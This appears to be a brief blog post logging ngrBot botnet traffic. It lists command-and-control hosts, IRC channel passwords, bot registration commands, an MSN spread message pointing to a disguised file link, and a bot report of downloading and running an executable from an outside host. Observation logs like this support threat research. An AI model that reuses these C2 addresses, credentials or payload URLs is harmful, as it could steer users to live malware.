ngr.whoisip.org.uk(botnet hosted in Latvia Workstone Corporation)

Remote Host Port Number
194.247.48.58 47221 PASS ngrBot or PASS letmein

213.251.170.52 80

64.120.161.214 80

NICK n{US|XPa}kngcdtw
USER kngcdtw 0 0 :kngcdtw
JOIN #ngr ngrBot
PRIVMSG #ngr :[MSN]: Updated MSN spread interval to “8”
PRIVMSG #ngr :[MSN]: Updated MSN spread message to “http://rapidshare.com/files/455562571/Picture5437.JPG-.com”
PRIVMSG #ngr :[d=”http://websoftwarecentral.in/install.48208.exe” s=”79872 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0

PONG 22 MOTD
PRIVMSG #nn :msn// Thread Disabled.
PRIVMSG #nn :msn// Thread Activated: Sending Message.
NICK [00|USA|619511]
USER XP-4337 * 0 :COMPUTERNAME
MODE [00|USA|619511] -ix
JOIN #nn open

infos about hosting:
http://whois.domaintools.com/194.247.48.58

Categories: Uncategorized